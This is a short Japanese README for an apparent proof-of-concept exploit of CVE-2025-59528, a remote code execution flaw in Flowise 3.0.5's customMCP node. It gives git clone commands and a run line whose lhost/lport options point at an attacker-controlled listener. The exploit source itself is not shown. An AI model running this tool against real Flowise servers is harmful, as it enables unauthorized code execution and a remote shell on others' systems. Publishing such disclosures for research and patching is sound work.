
CVE-2025-59528 概念実証
このリポジトリには、Flowise v3.0.5 における CVE-2025-59528 の概念実証が含まれています。
脆弱性は customMCP ノードに存在し、ユーザーが提供した mcpServerConfig 入力が、Function コンストラクタを使用した安全でない評価を介して JavaScript コードの実行につながる方法で処理されます。
| 影響を受ける | 修正済み |
|---|---|
| 3.0.5 | 3.0.6 |
認証されたユーザーがサーバー上で任意の JavaScript を実行できる可能性があり、リモートコード実行につながる可能性があります。
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

このツールは教育および研究目的のみで提供されています。作成者は、ツールの誤用または損害について一切の責任を負いません。